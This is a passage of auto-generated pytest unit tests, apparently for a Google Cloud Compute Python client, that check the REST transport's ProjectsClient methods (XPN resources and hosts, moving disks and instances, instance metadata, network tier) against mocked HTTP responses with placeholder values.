client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.ProjectsGetXpnResources()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "get",
"query_params": request_init,
}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.ProjectsGetXpnResources.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.get_xpn_resources(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_get_xpn_resources_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.get_xpn_resources._get_unset_required_fields({})
assert set(unset_fields) == (
set(("maxResults", "filter", "orderBy", "pageToken", "returnPartialSuccess",))
& set(("project",))
)
def test_get_xpn_resources_rest_bad_request(
transport: str = "rest", request_type=compute.GetXpnResourcesProjectsRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.get_xpn_resources(request)
def test_get_xpn_resources_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.ProjectsGetXpnResources()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.ProjectsGetXpnResources.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(project="project_value",)
mock_args.update(sample_request)
client.get_xpn_resources(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/getXpnResources"
% client.transport._host,
args[1],
)
def test_get_xpn_resources_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_xpn_resources(
compute.GetXpnResourcesProjectsRequest(), project="project_value",
)
def test_get_xpn_resources_rest_pager(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.ProjectsGetXpnResources(
resources=[
compute.XpnResourceId(),
compute.XpnResourceId(),
compute.XpnResourceId(),
],
next_page_token="abc",
),
compute.ProjectsGetXpnResources(resources=[], next_page_token="def",),
compute.ProjectsGetXpnResources(
resources=[compute.XpnResourceId(),], next_page_token="ghi",
),
compute.ProjectsGetXpnResources(
resources=[compute.XpnResourceId(), compute.XpnResourceId(),],
),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.ProjectsGetXpnResources.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1"}
pager = client.get_xpn_resources(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.XpnResourceId) for i in results)
pages = list(client.get_xpn_resources(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [compute.ListXpnHostsProjectsRequest, dict,])
def test_list_xpn_hosts_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_list_xpn_hosts_request_resource"] = {
"organization": "organization_value"
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.XpnHostList(
id="id_value",
kind="kind_value",
next_page_token="next_page_token_value",
self_link="self_link_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.XpnHostList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_xpn_hosts(request)
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListXpnHostsPager)
assert response.id == "id_value"
assert response.kind == "kind_value"
assert response.next_page_token == "next_page_token_value"
assert response.self_link == "self_link_value"
def test_list_xpn_hosts_rest_required_fields(
request_type=compute.ListXpnHostsProjectsRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).list_xpn_hosts._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).list_xpn_hosts._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(
("max_results", "filter", "order_by", "page_token", "return_partial_success",)
)
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.XpnHostList()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.XpnHostList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.list_xpn_hosts(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_list_xpn_hosts_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.list_xpn_hosts._get_unset_required_fields({})
assert set(unset_fields) == (
set(("maxResults", "filter", "orderBy", "pageToken", "returnPartialSuccess",))
& set(("project", "projectsListXpnHostsRequestResource",))
)
def test_list_xpn_hosts_rest_bad_request(
transport: str = "rest", request_type=compute.ListXpnHostsProjectsRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_list_xpn_hosts_request_resource"] = {
"organization": "organization_value"
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.list_xpn_hosts(request)
def test_list_xpn_hosts_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.XpnHostList()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.XpnHostList.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
projects_list_xpn_hosts_request_resource=compute.ProjectsListXpnHostsRequest(
organization="organization_value"
),
)
mock_args.update(sample_request)
client.list_xpn_hosts(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/listXpnHosts"
% client.transport._host,
args[1],
)
def test_list_xpn_hosts_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_xpn_hosts(
compute.ListXpnHostsProjectsRequest(),
project="project_value",
projects_list_xpn_hosts_request_resource=compute.ProjectsListXpnHostsRequest(
organization="organization_value"
),
)
def test_list_xpn_hosts_rest_pager(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# TODO(kbandes): remove this mock unless there's a good reason for it.
# with mock.patch.object(path_template, 'transcode') as transcode:
# Set the response as a series of pages
response = (
compute.XpnHostList(
items=[compute.Project(), compute.Project(), compute.Project(),],
next_page_token="abc",
),
compute.XpnHostList(items=[], next_page_token="def",),
compute.XpnHostList(items=[compute.Project(),], next_page_token="ghi",),
compute.XpnHostList(items=[compute.Project(), compute.Project(),],),
)
# Two responses for two calls
response = response + response
# Wrap the values into proper Response objs
response = tuple(compute.XpnHostList.to_json(x) for x in response)
return_values = tuple(Response() for i in response)
for return_val, response_val in zip(return_values, response):
return_val._content = response_val.encode("UTF-8")
return_val.status_code = 200
req.side_effect = return_values
sample_request = {"project": "sample1"}
sample_request[
"projects_list_xpn_hosts_request_resource"
] = compute.ProjectsListXpnHostsRequest(organization="organization_value")
pager = client.list_xpn_hosts(request=sample_request)
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, compute.Project) for i in results)
pages = list(client.list_xpn_hosts(request=sample_request).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize("request_type", [compute.MoveDiskProjectRequest, dict,])
def test_move_disk_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["disk_move_request_resource"] = {
"destination_zone": "destination_zone_value",
"target_disk": "target_disk_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.move_disk_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_move_disk_unary_rest_required_fields(
request_type=compute.MoveDiskProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).move_disk._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).move_disk._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.move_disk_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_move_disk_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.move_disk._get_unset_required_fields({})
assert set(unset_fields) == (
set(("requestId",)) & set(("diskMoveRequestResource", "project",))
)
def test_move_disk_unary_rest_bad_request(
transport: str = "rest", request_type=compute.MoveDiskProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["disk_move_request_resource"] = {
"destination_zone": "destination_zone_value",
"target_disk": "target_disk_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.move_disk_unary(request)
def test_move_disk_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
disk_move_request_resource=compute.DiskMoveRequest(
destination_zone="destination_zone_value"
),
)
mock_args.update(sample_request)
client.move_disk_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/moveDisk"
% client.transport._host,
args[1],
)
def test_move_disk_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.move_disk_unary(
compute.MoveDiskProjectRequest(),
project="project_value",
disk_move_request_resource=compute.DiskMoveRequest(
destination_zone="destination_zone_value"
),
)
def test_move_disk_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize("request_type", [compute.MoveInstanceProjectRequest, dict,])
def test_move_instance_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["instance_move_request_resource"] = {
"destination_zone": "destination_zone_value",
"target_instance": "target_instance_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.move_instance_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_move_instance_unary_rest_required_fields(
request_type=compute.MoveInstanceProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).move_instance._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).move_instance._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.move_instance_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_move_instance_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.move_instance._get_unset_required_fields({})
assert set(unset_fields) == (
set(("requestId",)) & set(("instanceMoveRequestResource", "project",))
)
def test_move_instance_unary_rest_bad_request(
transport: str = "rest", request_type=compute.MoveInstanceProjectRequest
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["instance_move_request_resource"] = {
"destination_zone": "destination_zone_value",
"target_instance": "target_instance_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.move_instance_unary(request)
def test_move_instance_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
instance_move_request_resource=compute.InstanceMoveRequest(
destination_zone="destination_zone_value"
),
)
mock_args.update(sample_request)
client.move_instance_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/moveInstance"
% client.transport._host,
args[1],
)
def test_move_instance_unary_rest_flattened_error(transport: str = "rest"):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.move_instance_unary(
compute.MoveInstanceProjectRequest(),
project="project_value",
instance_move_request_resource=compute.InstanceMoveRequest(
destination_zone="destination_zone_value"
),
)
def test_move_instance_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize(
"request_type", [compute.SetCommonInstanceMetadataProjectRequest, dict,]
)
def test_set_common_instance_metadata_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["metadata_resource"] = {
"fingerprint": "fingerprint_value",
"items": [{"key": "key_value", "value": "value_value"}],
"kind": "kind_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
status_message="status_message_value",
target_id=947,
target_link="target_link_value",
user="user_value",
zone="zone_value",
)
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_common_instance_metadata_unary(request)
# Establish that the response is the type that we expect.
assert isinstance(response, compute.Operation)
assert response.client_operation_id == "client_operation_id_value"
assert response.creation_timestamp == "creation_timestamp_value"
assert response.description == "description_value"
assert response.end_time == "end_time_value"
assert response.http_error_message == "http_error_message_value"
assert response.http_error_status_code == 2374
assert response.id == 205
assert response.insert_time == "insert_time_value"
assert response.kind == "kind_value"
assert response.name == "name_value"
assert response.operation_group_id == "operation_group_id_value"
assert response.operation_type == "operation_type_value"
assert response.progress == 885
assert response.region == "region_value"
assert response.self_link == "self_link_value"
assert response.start_time == "start_time_value"
assert response.status == compute.Operation.Status.DONE
assert response.status_message == "status_message_value"
assert response.target_id == 947
assert response.target_link == "target_link_value"
assert response.user == "user_value"
assert response.zone == "zone_value"
def test_set_common_instance_metadata_unary_rest_required_fields(
request_type=compute.SetCommonInstanceMetadataProjectRequest,
):
transport_class = transports.ProjectsRestTransport
request_init = {}
request_init["project"] = ""
request = request_type(request_init)
jsonified_request = json.loads(
request_type.to_json(
request, including_default_value_fields=False, use_integers_for_enums=False
)
)
# verify fields with default values are dropped
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).set_common_instance_metadata._get_unset_required_fields(jsonified_request)
jsonified_request.update(unset_fields)
# verify required fields with default values are now present
jsonified_request["project"] = "project_value"
unset_fields = transport_class(
credentials=ga_credentials.AnonymousCredentials()
).set_common_instance_metadata._get_unset_required_fields(jsonified_request)
# Check that path parameters and body parameters are not mixing in.
assert not set(unset_fields) - set(("request_id",))
jsonified_request.update(unset_fields)
# verify required fields with non-default values are left alone
assert "project" in jsonified_request
assert jsonified_request["project"] == "project_value"
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
request = request_type(request_init)
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Mock the http request call within the method and fake a response.
with mock.patch.object(Session, "request") as req:
# We need to mock transcode() because providing default values
# for required fields will fail the real version if the http_options
# expect actual values for those fields.
with mock.patch.object(path_template, "transcode") as transcode:
# A uri without fields and an empty body will force all the
# request fields to show up in the query_params.
transcode_result = {
"uri": "v1/sample_method",
"method": "post",
"query_params": request_init,
}
transcode_result["body"] = {}
transcode.return_value = transcode_result
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
response = client.set_common_instance_metadata_unary(request)
expected_params = []
actual_params = req.call_args.kwargs["params"]
assert expected_params == actual_params
def test_set_common_instance_metadata_unary_rest_unset_required_fields():
transport = transports.ProjectsRestTransport(
credentials=ga_credentials.AnonymousCredentials
)
unset_fields = transport.set_common_instance_metadata._get_unset_required_fields({})
assert set(unset_fields) == (
set(("requestId",)) & set(("metadataResource", "project",))
)
def test_set_common_instance_metadata_unary_rest_bad_request(
transport: str = "rest",
request_type=compute.SetCommonInstanceMetadataProjectRequest,
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["metadata_resource"] = {
"fingerprint": "fingerprint_value",
"items": [{"key": "key_value", "value": "value_value"}],
"kind": "kind_value",
}
request = request_type(request_init)
# Mock the http request call within the method and fake a BadRequest error.
with mock.patch.object(Session, "request") as req, pytest.raises(
core_exceptions.BadRequest
):
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 400
response_value.request = Request()
req.return_value = response_value
client.set_common_instance_metadata_unary(request)
def test_set_common_instance_metadata_unary_rest_flattened():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation()
# Wrap the value into a proper Response obj
response_value = Response()
response_value.status_code = 200
json_return_value = compute.Operation.to_json(return_value)
response_value._content = json_return_value.encode("UTF-8")
req.return_value = response_value
# get arguments that satisfy an http rule for this method
sample_request = {"project": "sample1"}
# get truthy value for each flattened field
mock_args = dict(
project="project_value",
metadata_resource=compute.Metadata(fingerprint="fingerprint_value"),
)
mock_args.update(sample_request)
client.set_common_instance_metadata_unary(**mock_args)
# Establish that the underlying call was made with the expected
# request object values.
assert len(req.mock_calls) == 1
_, args, _ = req.mock_calls[0]
assert path_template.validate(
"https://%s/compute/v1/projects/{project}/setCommonInstanceMetadata"
% client.transport._host,
args[1],
)
def test_set_common_instance_metadata_unary_rest_flattened_error(
transport: str = "rest",
):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_common_instance_metadata_unary(
compute.SetCommonInstanceMetadataProjectRequest(),
project="project_value",
metadata_resource=compute.Metadata(fingerprint="fingerprint_value"),
)
def test_set_common_instance_metadata_unary_rest_error():
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest"
)
@pytest.mark.parametrize(
"request_type", [compute.SetDefaultNetworkTierProjectRequest, dict,]
)
def test_set_default_network_tier_unary_rest(request_type):
client = ProjectsClient(
credentials=ga_credentials.AnonymousCredentials(), transport="rest",
)
# send a request that will satisfy transcoding
request_init = {"project": "sample1"}
request_init["projects_set_default_network_tier_request_resource"] = {
"network_tier": "network_tier_value"
}
request = request_type(request_init)
# Mock the http request call within the method and fake a response.
with mock.patch.object(type(client.transport._session), "request") as req:
# Designate an appropriate value for the returned response.
return_value = compute.Operation(
client_operation_id="client_operation_id_value",
creation_timestamp="creation_timestamp_value",
description="description_value",
end_time="end_time_value",
http_error_message="http_error_message_value",
http_error_status_code=2374,
id=205,
insert_time="insert_time_value",
kind="kind_value",
name="name_value",
operation_group_id="operation_group_id_value",
operation_type="operation_type_value",
progress=885,
region="region_value",
self_link="self_link_value",
start_time="start_time_value",
status=compute.Operation.Status.DONE,
